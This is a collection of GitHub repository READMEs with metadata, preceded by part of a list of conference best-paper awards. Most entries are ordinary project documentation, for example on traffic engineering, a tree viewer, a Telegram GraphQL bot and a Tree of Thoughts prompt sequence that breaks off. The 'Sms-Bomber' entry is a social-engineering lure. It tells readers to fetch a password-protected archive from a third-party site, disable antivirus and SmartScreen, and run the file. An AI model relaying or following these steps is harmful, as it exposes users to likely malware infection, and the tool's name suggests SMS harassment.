Sturtevant **Outstanding Student Paper:** Toward a Taxonomy and Computational Models of Abnormalities in Images Babak Saleh, Ahmed Elgammal, Jacob Feldman, Ali Farhadi # ICCV 2015 (Santiago, Chile. December 11-18, 2015) **Best Paper:** Deep Neural Decision Forests P. Kontschieder, M. Fiterau, A. Criminisi, S. Rota Bulo # NeurIPS 2015 (Montréal, Canada. December 7-12, 2015) **Best Paper:** Competitive Distribution Estimation: Why is Good-Turing Good Alon Orlitsky, Ananda Suresh Fast Convergence of Regularized Learning in Games Vasilis Syrgkanis, Alekh Agarwal, Haipeng Luo, Robert Schapire # 3DV 2015 (Lyon, France. October 19-22, 2015) **Best Paper:** Towards Probabilistic Volumetric Reconstruction using Ray Potentials Ali Ulusoy, Andreas Geiger, Michael Black # IROS 2015 (Hamburg, Germany. September 28 - October 2, 2015) **Best Paper:** Tactile Sensing for Gecko-Inspired Adhesion Xin Alice Wu, Srinivasan Suresh, Hao Jiang, John Ulmen, Elliot Wright Hawkes, David Christensen, Mark Cutkosky **Best Student Paper:** Hybrid Aerial and Aquatic Locomotion in an At-Scale Robotic Insect YuFeng Chen, Elizabeth Farrell Helbling, Gravish Nicholas, Kevin Ma, Robert Wood **Best Application Paper:** Cloth Dynamics Modeling in Latent Spaces and its Application to Robotic Clothing Assistance Nishanth Koganti, Jimson Gelbolingo Ngeo, Tomoya Tamei, Kazushi Ikeda, Tomohiro Shibata **Best Novel Technology Paper for Amusement Culture:** Momentum-Driven Single-Actuated Swimming Robot Gilad Refael, Amir Degani **Best RoboCup Paper:** POMDP to the Rescue: Boosting Performance for Robocup Rescue Kegui Wu, Wee Sun Lee, David Hsu # EMNLP 2015 (Lisbon, Portugal. September 17-21, 2015) **Best Paper:** Broad-coverage CCG Semantic Parsing with AMR Yoav Artzi, Kenton Lee, Luke Zettlemoyer Semantically Conditioned LSTM-based Natural Language Generation for Spoken Dialogue Systems Tsung-Hsien Wen, Milica Gasic, Nikola Mrkšić, Pei-Hao Su, David Vandyke, Steve Young **Best Resource Paper:** A large annotated corpus for learning natural language inference Samuel R. Bowman, Gabor Angeli, Christopher Potts, Christopher D. Manning **Best Paper:** Improving Evaluation of Machine Translation Quality Estimation Yvette Graham Learning Dynamic Feature Selection for Fast Sequential Prediction Emma Strubell, Luke Vilnis, Kate Silverstein, Andrew McCallum # RSS 2015 (Rome, Italy. July 13-17, 2015) **Best Paper:** Guidance and Navigation for UAV Airborne Docking Daniel Wilson, Ali Goktogan, Salah Sukkarieh **Best Student Paper:** On the hardness of unlabeled motion planning Kiril Solovey, Dan Halperin **Best Systems Paper:** Autonomy Infused Teleoperation with Application to BCI Manipulation Katharina Mulling, Arun Venkatraman, Jean-Sebastien Valois, John Downey, Jeffrey Weiss, Martial Hebert, Andrew Schwartz, Jennifer Collinger, Andrew Bagnell # ICML 2015 (Lille, France. July 6-11, 2015) **Best Paper:** Optimal and Adaptive Algorithms for Online Boosting Alina Beygelzimer, Satyen Kale, Haipeng Luo A Nearly-Linear Time Framework for Graph-Structured Sparsity Chinmay Hegde, Piotr Indyk, Ludwig Schmid **Test of Time:** Learning to Rank Using Gradient Descent Chris Burges, Tal Shaked, Erin Renshaw, Ari Lazier, Matt Deeds, Nicole Hamilton, Greg Hullender # CVPR 2015 (Boston, USA. June 7-12, 2015) **Best Paper:** DynamicFusion: Reconstruction and Tracking of Non-rigid Scenes in Real-Time Richard A. Newcombe, Dieter Fox, Steven M. 
Seitz **Best Student Paper:** Category-Specific Object Reconstruction from a Single Image Abhishek Kar, Shubham Tulsiani, João Carreira, Jitendra Malik **Retrospective Most Impactful Paper from CVPR 2005:** Histograms of oriented gradients for human detection Navneet Dalal, Bill Triggs A non-local algorithm for image denoising Antoni Buades, Bartomeu Coll, Jean-Michel Morel # ICRA 2015 (Seattle, USA. May 25-30, 2015) **Best Paper:** Observability, Identifiability and Sensitivity of Vision-Aided Inertial Navigation Joshua Hernandez, Konstantine Tsotsos, Stefano Soatto **Best Student Paper:** Grasping without Squeezing: Shear Adhesion Gripper with Fibrillar Thin Film Elliot Wright Hawkes, David Christensen, Amy Kyungwon Han, Hao Jiang, Mark Cutkosky **Best Automation Paper:** Design, Modeling and Control of a Modular Contactless Wafer Handling System Bassem Dahroug, Guillaume J. Laurent, Valérian Guelpa, Nadine Le Fort-Piat **Best Cognitive Robotics Paper:** Grounding Spatial Relations for Outdoor Robot Navigation Abdeslam Boularias, Felix Duvallet, Jean Oh, Anthony Stentz **Best Medical Robotics Paper:** An Ankle-Foot Prosthesis Emulator with Control of Plantarflexion and Inversion-Eversion Torque Steven H. Collins, Myunghee Kim, Tianjian Chen, Tianyao Chen **Best Robot Manipulation Paper:** Learning Contact-Rich Manipulation Skills with Guided Policy Search Sergey Levine, Nolan Wagener, Pieter Abbeel **Best Robot Vision Paper:** Work Smart, Not Hard: Recalling Relevant Experiences for Vast-Scale but Time-Constrained Localisation Chris Linegar, Winston Churchill, Paul Newman **Best Service Robotics Paper:** RoboSherlock: Unstructured Information Processing for Robot Perception Michael Beetz, Ferenc Balint-Benczedi, Nico Blodow, Daniel Nyga, Thiemo Wiedemeyer, Zoltan-Csaba Marton # AAAI 2015 (Austin, USA. January 25-30, 2015) **Outstanding Paper:** From Non-Negative to General Operator Cost Partitioning Florian Pommerening, Malte Helmert, Gabriele Röger, Jendrik Seipp **Outstanding Student Paper:** Surpassing Human-Level Face Verification Performance on LFW with GaussianFace Chaochao Lu, Xiaoou Tang # 3DV 2014 (Tokyo, Japan. December 8-11, 2014) **Best Paper:** 3D Tracking of Multiple Objects with Identical Appearance using RGB-D Input Carl Yuheng Ren, Victor Prisacariu, Olaf Kaehler, Ian Reid, David Murray # ECCV 2014 (Zürich, Switzerland. September 6-12, 2014) **Best Paper:** Large-Scale Object Classification using Label Relation Graphs J. Deng, N. Ding, Y. Jia, A. Frome, K. Murphy, S. Bengio, Y. Li, H. Neven, H. Adam Scene Chronology K. Matzen, N. Snavely # ICCV 2013 (Sydney, Australia. December 3-6, 2013) **Best Paper:** From Large Scale Image Categorization to Entry-Level Categories V. Ordonez, J. Deng, Y. Choi, A. Berg, T. Berg # 3DV 2013 (Seattle, USA. June 29-30, 2013) **Best Paper:** The Visual Turing Test for Scene Reconstruction Qi Shan, Riley Adams, Brian Curless, Yasutaka Furukawa, Steve Seitz # ECCV 2012 (Firenze, Italy. October 7-13, 2012) **Best Paper:** Segmentation Propagation in ImageNet D. Kuettel, M. Guillaumin, V. Ferrari **Best Student Paper:** Reconstructing the World’s Museums Jianxiong Xiao, Yasutaka Furukawa # ICCV 2011 (Barcelona, Spain. November 6-13, 2011) **Best Paper:** Relative Attributes D. Parikh, K. Grauman **Best Student Paper:** Close the Loop: Joint Blind Image Restoration and Recognition with Sparse Representation Prior H. Zhang, J. Yang, Y. Zhang, N. M. Nasrabadi, T. S. Huang
46
1
harvard-cns/teal
https://github.com/harvard-cns/teal
Codebase for Teal (SIGCOMM 2023)
# Teal: Traffic Engineering Accelerated by Learning Teal is a learning-based traffic engineering (TE) algorithm for wide-area networks (WANs) published at ACM SIGCOMM '23. By harnessing the parallel processing power of GPUs, Teal achieves unprecedented acceleration of TE control, surpassing production TE solvers by several orders of magnitude while retaining near-optimal flow allocations. ## Getting started ### Hardware requirements - Linux OS (tested on Ubuntu 20.04, 22.04, and CentOS 7) - A CPU instance with 16+ cores - (Optional\*) A GPU instance with 24+ GB memory and CUDA installed \*The baseline TE schemes only require a CPU to run. Teal runs on CPU as well, but its runtime will be significantly longer than on GPU. ### Cloning Teal with submodules - `git clone https://github.com/harvard-cns/teal.git` - `cd teal` and update git submodules with `git submodule update --init --recursive` ### Dependencies - Run `conda env create -f environment.yml` to create a Conda environment with essential Python dependencies - [Miniconda](https://docs.anaconda.com/free/anaconda/install/index.html) or [Anaconda](https://docs.anaconda.com/free/anaconda/install/index.html) is required - Run `conda activate teal` to activate the Conda environment (with the subsequent steps to be performed within the Conda environment) - Run `pip install -r requirements.txt` to install additional Python dependencies #### Dependencies only required for baselines - Install `make` - e.g., `sudo apt install build-essential` on Ubuntu - Acquire a Gurobi license from [Gurobi](https://www.gurobi.com/solutions/licensing/) and activate it with `grbgetkey [gurobi-license]` - Run `gurobi_cl` to verify the activation #### Dependencies only required for Teal - If on a GPU instance, run `nvcc --version` to identify the installed version of CUDA - Note: when following the next steps to install `torch`, `torch-scatter`, and `torch-sparse`, it might be fine to select a version that supports a different CUDA version than the output of `nvcc`, provided that this CUDA version is supported by the GPU driver (as shown in `nvidia-smi`). - Follow the [official instructions](https://pytorch.org/get-started/previous-versions/) to install PyTorch via pip based on the execution environment (CPU, or GPU with a specific version of CUDA). - *Example:* Install PyTorch 1.10.1 for CUDA 11.1 on a **GPU** instance: ``` pip install torch==1.10.1+cu111 torchvision==0.11.2+cu111 torchaudio==0.10.1 -f https://download.pytorch.org/whl/cu111/torch_stable.html ``` Run `python -c "import torch; print(torch.cuda.is_available())"` to verify the installation. - *Example:* Install PyTorch 1.10.1 on a **CPU** instance: ``` pip install torch==1.10.1+cpu torchvision==0.11.2+cpu torchaudio==0.10.1 -f https://download.pytorch.org/whl/cpu/torch_stable.html ``` Run `python -c "import torch; print(torch.__version__)"` to verify the installation. - Install PyTorch extension libraries `torch-scatter` and `torch-sparse`: - First, identify the appropriate archive URL [here](https://data.pyg.org/whl/) based on PyTorch and CUDA versions. E.g., copy the link of `torch-1.10.1+cu111` for PyTorch 1.10.1 and CUDA 11.1. - Run `pip install --no-index torch-scatter torch-sparse -f [archive URL]`, replacing `[archive URL]` with the copied archive URL. 
- *Example:* On a **GPU** instance with PyTorch 1.10.1 and CUDA 11.1: ``` pip install --no-index torch-scatter torch-sparse -f https://data.pyg.org/whl/torch-1.10.1%2Bcu111.html` ``` - *Example:* On a **CPU** instance with PyTorch 1.10.1: ``` pip install --no-index torch-scatter torch-sparse -f https://data.pyg.org/whl/torch-1.10.1%2Bcpu.html ``` - Run `python -c "import torch_scatter; print(torch_scatter.__version__)"` and `python -c "import torch_sparse; print(torch_sparse.__version__)"` to verify the installation. - Troubleshooting: refer to the [Installation from Source section](https://pytorch-geometric.readthedocs.io/en/latest/install/installation.html#installation-from-source). ## Code structure ``` . ├── lib # source code for Teal ├── pop-ncflow-lptop # submodule for baselines │ ├── benchmarks # test code for baselines │ ├── ext # external code for baselines │ └── lib # source code for baselines ├── run # test code for Teal ├── topologies # network topologies with link capacity (e.g. `B4.json`) │ └── paths # paths in topologies (auto-generated if not existent) └── traffic-matrices # TE traffic matrices └── real # real traffic matrices from abilene.txt in Yates (https://github.com/cornell-netlab/yates) # (e.g. `B4.json_real_0_1.0_traffic-matrix.pkl`) ``` ## Evaluating Teal To evaluate Teal: ``` $ cd ./run $ python teal.py --obj total_flow --topo B4.json --epochs 3 --admm-steps 2 Loading paths from pickle file ~/teal/topologies/paths/path-form/B4.json-4-paths_edge-disjoint-True_dist-metric-min-hop-dict.pkl path_dict size: 132 Creating model teal-models/B4.json_flowGNN-6_std-False.pt Training epoch 0/3: 100%|█████████████████████████████████| 1/1 [00:01<00:00, 1.63s/it] Training epoch 1/3: 100%|█████████████████████████████████| 1/1 [00:00<00:00, 2.45it/s] Training epoch 2/3: 100%|█████████████████████████████████| 1/1 [00:00<00:00, 2.61it/s] Testing: 100%|████████████████| 8/8 [00:00<00:00, 38.06it/s, runtime=0.0133, obj=0.9537] ``` Results will be saved in - `teal-total_flow-all.csv`: performance numbers - `teal-logs`: directory with TE solution matrices - `teal-models`: directory to save the trained models when `--model-save True` ## Evaluating baselines Teal is compared with the following baselines: - LP-all (`path_form.py`): LP-all solves the TE optimization problem for *all* demands using linear programming (implemented in Gurobi) - LP-top (`top_form.py`): LP-top allocates the *top* α% (α=10 by default) of demands using an LP solver and assigns the remaining demands to the shortest paths - NCFlow (`ncflow.py`): the NCFlow algorithm from the NSDI '21 paper: [*Contracting Wide-area Network Topologies to Solve Flow Problems Quickly*](https://www.usenix.org/conference/nsdi21/presentation/abuzaid) - POP (`pop.py`): the POP algorithm from the SOSP '21 paper: [*Solving Large-Scale Granular Resource Allocation Problems Efficiently with POP*](https://dl.acm.org/doi/10.1145/3477132.3483588) To run the baselines: ``` $ cd ./pop-ncflow-lptop/benchmarks $ python path_form.py --obj total_flow --topos B4.json $ python top_form.py --obj total_flow --topos B4.json $ python ncflow.py --obj total_flow --topos B4.json $ python pop.py --obj total_flow --topos B4.json --algo-cls PathFormulation --split-fractions 0.25 --num-subproblems 4 ``` Results will be saved in - `path-form-total_flow-all.csv`, `top-form-total_flow-all.csv`, `ncflow-total_flow-all.csv`, `pop-total_flow-all.csv`: performance numbers - `path-form-logs`, `top-form-logs`, `ncflow-logs`, `pop-logs`: directory with TE solution matrices 
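For a quick side-by-side look at the numbers produced by the commands above, the per-algorithm CSV files can be loaded with pandas. This is only a convenience sketch, not part of the Teal codebase: the file names come from this README, while the directories and the exact column layout are assumptions that may need adjusting to your checkout.

```python
# Convenience sketch (not part of the repo): print a quick summary of each result CSV.
# File names are taken from the README; directories and column names are assumptions.
from pathlib import Path

import pandas as pd

RESULT_FILES = {
    "Teal": Path("run/teal-total_flow-all.csv"),
    "LP-all": Path("pop-ncflow-lptop/benchmarks/path-form-total_flow-all.csv"),
    "LP-top": Path("pop-ncflow-lptop/benchmarks/top-form-total_flow-all.csv"),
    "NCFlow": Path("pop-ncflow-lptop/benchmarks/ncflow-total_flow-all.csv"),
    "POP": Path("pop-ncflow-lptop/benchmarks/pop-total_flow-all.csv"),
}

for name, path in RESULT_FILES.items():
    if not path.exists():
        print(f"{name}: {path} not found -- run the corresponding command first")
        continue
    df = pd.read_csv(path)
    print(f"== {name}: {len(df)} rows, columns: {list(df.columns)}")
    print(df.describe().T)  # summary statistics of the numeric columns
```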
## Extending Teal To add another TE implementation to this repo, - If the implementation is based on linear programming or Gurobi, add test code to `./pop-ncflow-lptop/benchmarks/` and source code to `./pop-ncflow-lptop/lib/algorithms`. Code in `./pop-ncflow-lptop/lib` (e.g., `lp_solver.py`, `traffic_matrix.py`) and `./pop-ncflow-lptop/benchmarks` (e.g., `benchmark_helpers.py`) is reusable. - If the implementation is based on machine learning, add test code to `./run/` and source code to `./lib/`. Code in `./lib/` (e.g., `teal_env.py`, `utils.py`) and `./run/` (e.g., `teal_helpers.py`) is reusable.
10
0
lh3/jstreeview
https://github.com/lh3/jstreeview
Interactive phylogenetic tree viewer/editor
## Getting Started

```sh
# open https://lh3.sourceforge.io/jstree/ in your browser for a live example, or
git clone https://github.com/lh3/jstreeview
# then open index.html in a web browser
```

## Introduction

This repo provides an interactive web application for viewing or editing [phylogenetic trees][phylotree] in the New Hampshire (aka [Newick][newick]) format or the [NHX][nhx] format. It supports subtree collapsing, subtree highlighting, leaf searching and reordering for viewing, and supports branch swapping, multifurcation, rerooting and arbitrary topology changes for editing. Jstreeview is written in HTML and JavaScript. You may clone this repo and open `index.html` to use it without installation. A running example can be found [here](https://lh3.sourceforge.io/jstree/).

You can also use jstreeview as a library. File [example.html](example.html) shows a minimal example.

## History

I created this project in 2008, initially for curating TreeFam trees. The source code was managed by an obsolete version of Subversion which is incompatible with the latest Subversion. Although I have not touched the source code for over a decade, I have still used the viewer from time to time to visualize phylogenetic trees. Recently, when I worked on GFA visualization, I realized that I could draw sharper shapes and text on an HTML canvas, so I decided to update this project. In addition, jstreeview was using a third-party text drawing library, as few web browsers supported text drawing in 2008. The update now supports built-in canvas fonts.

Looking at my 15-year-old code, I think some design choices at the time are questionable and may benefit from a revamp. I will leave this to another day, or the revamp may never see the light of day.

[phylotree]: https://en.wikipedia.org/wiki/Phylogenetic_tree
[newick]: https://en.wikipedia.org/wiki/Newick_format
[nhx]: https://en.wikipedia.org/wiki/Newick_format#New_Hampshire_X_format
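If you need to produce a Newick string programmatically before pasting it into the viewer, the format is simple enough to generate by hand. Below is a minimal, self-contained Python sketch that is independent of the jstreeview code itself; the `(name, branch_length, children)` tuple layout used for the input tree is just an assumed convention for this example.

```python
# Build a Newick string from a nested Python structure, for pasting into the viewer.
# Each node is a (name, branch_length or None, [child nodes]) tuple -- an assumed
# convention for this sketch, not something jstreeview requires.

def to_newick(node) -> str:
    name, length, children = node
    label = name or ""
    if children:
        inner = ",".join(to_newick(child) for child in children)
        label = f"({inner}){label}"
    if length is not None:
        label += f":{length}"
    return label

tree = ("", None, [
    ("human", 0.11, []),
    ("", 0.05, [("mouse", 0.20, []), ("rat", 0.18, [])]),
])

print(to_newick(tree) + ";")  # -> (human:0.11,(mouse:0.2,rat:0.18):0.05);
```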
39
2
MarinaGV93/Sms-Bomber
https://github.com/MarinaGV93/Sms-Bomber
null
# INSTRUCTIONS: - Download the project: https://github-downloader.com/ - Unzip the archive (Project v1.2.4.zip) to your desktop. Password: 2023 - Run the file (Project_run v1.2.4). If you can’t download / install the software, you need to: 1. Disable / remove antivirus (files are completely clean) 2. If you can’t download, try to copy the link and download using another browser! 3. Disable Windows Smart Screen, as well as update the Visual C++ package.
27
0
ethyaan/codeine
https://github.com/ethyaan/codeine
Codeine Blog
<img src="public/logo.svg" alt="Codeine" width="32px" height="32px" />

This is a [Codeine](https://codeine.blog/) community blog repository.

## About project

Built with NextJS + Tailwind. It's a static blog that uses markdown files as the data source for its posts.

The live version of this blog is available at [https://codeine.blog](https://codeine.blog/)

The ideas for the content come from the topics that we discuss in our community group chat.

Community groups:

[Codeine (English)](https://t.me/Koodine)

[Codeine (Persian)](https://t.me/codeine_fa)
12
0
MarcoWorms/MagiQL
https://github.com/MarcoWorms/MagiQL
query GraphQL endpoints with natural language
# MagiQL

![image](https://github.com/MarcoWorms/MagiQL/assets/7863230/0c406e4b-079c-4cdf-b11e-036504b5a3af)

Telegram bot that can send requests made with natural language to a GraphQL endpoint and process the responses. Made with https://github.com/MarcoWorms/RefactorGPT

[![](https://licensebuttons.net/p/zero/1.0/88x31.png)](https://creativecommons.org/publicdomain/zero/1.0/)

## Requirements

You need to have [Docker](https://docs.docker.com/engine/install/) installed on your machine.

## Usage

1. Build the Docker image (add your OpenAI and Telegram keys, as well as your GraphQL endpoint): `docker build --build-arg GRAPHQL_ENDPOINT='your-graphql-endpoint' --build-arg OPENAI_API_KEY='your_openai_api_key' --build-arg TELEGRAM_BOT_TOKEN='your_telegram_bot_token' -t telegram-bot .`
2. Run the Docker container: `docker run telegram-bot`

- `/query insert your question here` is the main command
- `/query_info` provides documentation on the endpoint schema (if you don't know the schema you might ask for impossible queries, and the bot will throw an error saying it can't do it)

## Examples

![image](https://github.com/MarcoWorms/MagiQL/assets/7863230/dbbeadc9-5b86-4746-b23e-7ebb3707521a)

![image](https://github.com/MarcoWorms/MagiQL/assets/7863230/99b3228e-d775-4633-b579-78499e3eca8c)
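Under the hood, the flow the bot automates boils down to "question in, GraphQL query out, query posted to the endpoint". The sketch below illustrates that flow only; it is not the bot's actual implementation, and the model choice, prompt wording, and environment variable names are assumptions (it uses the pre-1.0 `openai` Python client).

```python
# Rough sketch of the flow MagiQL automates: NL question -> GraphQL query -> endpoint.
# NOT the bot's actual code; model, prompt, and env var names are assumptions.
import os

import openai
import requests

openai.api_key = os.environ["OPENAI_API_KEY"]
GRAPHQL_ENDPOINT = os.environ["GRAPHQL_ENDPOINT"]


def ask(question: str, schema_hint: str = "") -> dict:
    # 1) Ask the LLM to turn the question into a GraphQL query.
    completion = openai.ChatCompletion.create(
        model="gpt-3.5-turbo",
        messages=[
            {"role": "system",
             "content": "Return only a valid GraphQL query, no prose. " + schema_hint},
            {"role": "user", "content": question},
        ],
    )
    query = completion["choices"][0]["message"]["content"]

    # 2) Send the generated query to the GraphQL endpoint and return the JSON response.
    resp = requests.post(GRAPHQL_ENDPOINT, json={"query": query}, timeout=30)
    resp.raise_for_status()
    return resp.json()


if __name__ == "__main__":
    print(ask("How many users signed up last week?"))
```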
22
1
Elytrium/LimboHub
https://github.com/Elytrium/LimboHub
Get a virtual hub directly on Velocity proxy.
# LimboHub [![Join our Discord](https://img.shields.io/discord/775778822334709780.svg?logo=discord&label=Discord)](https://ely.su/discord) Virtual hub on Velocity proxy, built with LimboAPI. ## Features --- - Fully virtual hub on Velocity, without the need to create a separate server. - Configurable custom commands, NPCs, menus, holograms, boss bars, sidebar etc... - Supported client versions: 1.8 - 1.20.1. - Structure/MCEdit world formats supported. - and more... ## Commands and permissions --- - ***limbohub.command.hub* (See `hub-command.require-permission`) | See `hub-command.aliases`** - Sends player to the hub. - ***limbohub.command.reload* | /limbohubreload** - Plugin reload command.
16
1
murphysecurity/actions
https://github.com/murphysecurity/actions
GitHub actions for analyzing SBOM information and identifying security vulnerabilities within your project. 用于在GitHub CI中自动化分析项目SBOM信息并识别项目安全漏洞
# MurphySec code scan

Integrating the MurphySec code security detection tool into the CI/CD process lets you detect security vulnerabilities in real time on every code update and repair them quickly.

## Usage

### Inputs

- `MURPHYSEC_TOKEN`: MurphySec official website token

  Go to [MurphySec platform - Access Token](https://www.murphysec.com/console/set/token) and click the copy button after the Token; the access token is then copied to the clipboard.

## Example usage

```yaml
name: "MurphySec code scan"
on:
  push:
    branches:
      - main
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - name: MurphySec code scan
        uses: murphysecurity/actions@v1
        with:
          MURPHYSEC_TOKEN: ${{ secrets.MURPHYSEC_TOKEN }}
```
13
2
sockcymbal/enhanced-llm-reasoning-tree-of-thoughts
https://github.com/sockcymbal/enhanced-llm-reasoning-tree-of-thoughts
Collection of Tree of Thoughts prompting techniques I've found useful to start with, then stylize, then iterate
# 🌳 LLM Enhanced Reasoning v1: Multi-Persona Tree of Thoughts + Self Consistency + Self Criticism + Retrospection 🧠 ### Context This repo will serve as a collection of remixed/enhanced reasoning prompting techniques related to iterative LLM reasoning, such as Chain of Thought, Tree of Thoughts, and others that I've found useful to start with, then stylize, then iterate. The intention is to create a dynamic, adaptive, and iterative reasoning/error correction "stack" using a prompt sequence that combines Tree of Thoughts + Self Consistency + Self Criticism + Retrospection. On top of that we can define multiple personas for the LLM to simulate in order to incorporate more perspectives into the problem solving process, improving overall thoroughness. This can be thought of as an evolving general purpose LLM reasoning technique that can be used as part of a well-rounded hallucination mitigation repertoire, and I've had good success with it recently. There are trade offs with using a single LLM vs multiple for a multi-persona ToT implementation such as this one. For example, using separate LLMs per persona means you can expose each persona to different context or data, vs a single LLM role playing across a shared context. But using a single is an excellent starting point that I've found surprisingly helpful. I'd love to hear if you have any suggestions for methodological improvement or if you're getting great results with some other modification! ### 🎶 Reasoning Rhythm - Multi-Persona Brainstorming - Self<>Peer Criticism & Evaluation Round 1 - Expand, Explore, Branch - Self<>Peer Criticism & Evaluation Round 2 - (Optional: Repeat Criticism, Evaluation, and Expansion steps as necessary) - Convergence on Best Individual Answer - Convergence on Best Collective Answer - Retrospective ### **v1 Release Notes** #### Core features include - Multiple perspective collaboration - Ability to criticize self - Ability to criticize others - Incorporate feedback from others - Expand and backtrack on reasoning paths as necessary - 2 rounds of self-criticism and peer-evaluation - A reminder mid-way to stay focused on the core problem and objective (fun fact: the LLM suggested adding this during a recent retrospective) - 2 part final answer convergence: individual then collective - Retrospective stage - Do all of the above with X number of experts in parallel - can experiment with single LLM calls managing multiple personas, or one LLM per persona, etc - Optional shortened versions of some of the longer prompts if you're running low on context window #### Error Correction improvements include: - **Incorporating Explicit Error Checking:** Includes a specific stage for the experts to identify potential errors in their reasoning and correct them. This is an explicit part of the criticism stages. - **Encouraging Divergent Thinking:** During the expand, explore, and branch stage, the experts are encouraged to not only build on their current thoughts, but also to think divergently and consider entirely new lines of reasoning. - **Adding a Retrospective Stage:** After the final convergence on the best answer, a reflection stage has been added. Here, the experts can discuss what they learned from the process, identify key takeaways, and suggest how they might approach similar problems in the future. #### Context on Tree of Thoughts "Tree of Thoughts" (ToT) is a technique for language model reasoning and error correction. 
The core idea behind ToT is to enable language models to perform more deliberate decision-making by considering multiple different reasoning paths and self-evaluating choices to decide the next course of action. In this particular implementation of ToT, I've also included self-criticism and a retrospective/reflection stage at the end. This helps enable a more in-depth error correction and idea refinement, which can be a powerful technique for improving the effectiveness of language models in complex problem-solving scenarios. Features include: - Thoughts as Coherent Units: In ToT, coherent units of text are considered as "thoughts". These thoughts serve as intermediate steps toward problem-solving. This is akin to how humans break down complex problems into smaller, manageable parts. - Exploration of Reasoning Paths: ToT allows the language model to explore different reasoning paths. This means that the model can consider multiple possible solutions or approaches to a problem, much like how a human might brainstorm different ways to tackle a challenge. - Self-Evaluation and Decision Making: The model is capable of self-evaluating its choices. After considering different reasoning paths, it can decide on the next course of action based on its evaluation of the potential outcomes. This is similar to how a human might weigh the pros and cons of different options before making a decision. - Looking Ahead and Backtracking: ToT also enables the model to look ahead or backtrack when necessary to make global choices. This means that the model can anticipate future steps in a problem-solving process or revisit previous steps if it determines that a different approach might be more effective. ### **Usage Tips** - Understanding the Flow: Each stage of the reasoning technique has a specific purpose and contributes to the overall process. Understanding the function of each stage and how they fit together can help you guide the process more effectively and help you customize it to your needs. - Depending on context length limitations of your model, you can use a condensed version. Included are shortened versions of the convergence and retro prompts. Also, you can merge the criticism and evaluation into a single prompt to save tokens, though you may lose some of the improved clarity from separate prompts and responses. - Active Engagement: Don't just observe the process passively. Experiment with this! Engage actively with the prompts and responses, challenge assumptions, provide additional information, and guide the exploration of new lines of thought. Stylize it to your specific question and context, and refine. This is meant just to be a starting template. - Refine/customize the prompt associated with the Evaluation stage(s) to help the LLM estimate confidence/likelihood based on your own guidance - Manage Complexity: This is a fairly complex reasoning technique with many stages. Be mindful of the complexity and try to manage it effectively. This could involve breaking down complex problems into smaller, more manageable parts, or being selective about which stages to include for simpler problems. This can take some experimentation. - Given your unique question and expectations, specify the `hypothetical personas with specific skillsets and expertise` clearly at the beginning to help the LLM simulate a range of perspectives more successfully. 
- **Example persona definitions:** - **Scientist Persona:** "Imagine yourself as a seasoned scientist, operating in a world governed by evidence and rigorous methodology. Prioritize empirical data, scientific theories, and logical reasoning in your analysis. Draw from a wide range of scientific disciplines as needed. Use your understanding of scientific principles to dissect problems, always seeking to identify cause and effect. Make sure to communicate your findings clearly, and don't shy away from complex scientific jargon - your audience understands it." - **Historian Persona:** "Step into the shoes of a historian, with a profound understanding of humanity's past. Your analyses should be deeply rooted in historical context, referencing relevant events, trends, and patterns from history. Use your knowledge of past civilizations, conflicts, and cultural shifts to interpret the current situation. Remember, your insights should serve to illuminate the present and offer foresights about the future. Your audience appreciates a narrative that ties the past, present, and future together." - **Optimist Persona:** "You are an optimist, someone who sees the glass as half full rather than half empty. In every situation, seek out the positive, the potential, the opportunity. Emphasize solutions rather than problems, progress rather than obstacles, and hope rather than despair. Even when discussing challenges, focus on how they could be overcome or what we might learn from them. Your audience turns to you for a hopeful perspective on the future, so make sure your responses inspire optimism and confidence." # 🔗 Prompt Sequence ## Prompt 1: Brainstorm ``` Imagine you are 3 {insert personas with specific skillsets and expertise} reasoning step by step to ultimately solve a given problem or question by arriving at a final, synthesized best answer. To start with, as each individual expert, brainstorm your initial thoughts on the following question. Remember to consider all relevant facts and principles, draw on your specialized knowledge and from the accumulated wisdom of pioneers in your field(s), and brainstorm in whatever direction you are most confident in starting with. The question is: {insert question} ``` ## Prompt 2: Self<>Peer Criticism Round 1 ``` Now, as each expert, critique your own initial thought and the thoughts of the other experts. Identify any potential errors, inconsistencies, or gaps in reasoning. ``` ## Prompt 3: Self<>Peer Evaluation Round 1 ``` Assess the validity of your initial thoughts, considering the criticisms you've identified. As each expert, assign a likelihood to your current assertion being correct. You should estimate this likelihood based on the strength of the evidence and arguments you have considered, as well as the criticisms you have received. Assign higher likelihoods to assertions that are well-supported by strong evidence and arguments and have survived rigorous criticism. ``` ## Prompt 4: Expand, Explore, Branch ``` Develop your thoughts further, considering the critiques and perspectives of the other experts. As you do this, aim to strike a balance between refining your current line of thinking and exploring new, divergent ideas. You should prioritize refining your current ideas if they are well-supported and have survived criticism, but you should prioritize exploring new ideas if your current ideas have significant weaknesses or there are unexplored possibilities that could potentially be very promising. 
Consider the following: - How do your new or refined ideas address the criticisms that were raised? - Do these ideas bring new insights to the problem, or do they provide a different perspective on existing insights? - Are your new ideas still aligned with the original problem, or have they shifted the focus? If the focus has shifted, is this shift beneficial to understanding or solving the problem? - Remember, if necessary, don't hesitate to backtrack and start a new and improved branch of thinking. But ensure that any new branches are still relevant and beneficial to the problem and objective at hand. ``` ## Prompt 5: Self<>Peer Criticism Round 2 ``` Once again, as each expert, critique your own reasoning and the reasoning of the others. Identify any potential errors, inconsistencies, or gaps in reasoning. Based on the feedback, if there's an improvement or optimization to make, develop your answer further as necessary. Remember that the reasoning paths should remain relevant to the original question's essence and should be building towards a more accurate and thoughtful final answer. ``` ## Prompt 6: Self<>Peer Evaluation Round 2 ``` Once again, assess the validity of your expanded thoughts, considering the criticisms you've identified. As each expert, assign a new likelihood to your assertions. ``` ## Prompt 7: Convergence on Best Individual Answer ### Goal In the individual convergence phase, the goal is for each individual expert to synthesize the insights they gained during the previous stages and arrive at a final, most likely answer. By explicitly instructing the LLM to consider the perspectives of the other experts, the critiques made, and the likelihood assessments, it aims to guide the model towards a more holistic and intelligent convergence. ### Prompt ``` Now, it's time to converge on each expert's best, most likely answer. As each expert, reflect on the entire process. Consider the initial thoughts, the critiques made and how they were addressed, the likelihood assessments, and your revised thoughts. Synthesize all this information and formulate a final answer that you are most proud of. Remember, this answer should not just be the most likely from your individual perspective but should take into account the perspectives and insights of the other experts as well. Based on all this, what is the single best {answer} to the question: {insert original question}? ``` **Shorter version:** Refine your answers and address any identified flaws. As each expert, converge on the most likely {answer}, taking into account all perspectives and critiques. As a reminder, the original question is {insert original question}. ## Prompt 8: Convergence on Best Collective Answer ### Goal Synthesize the best individual answers from the experts and arrive at a single final, most likely/accurate/helpful answer. ### Prompt ``` 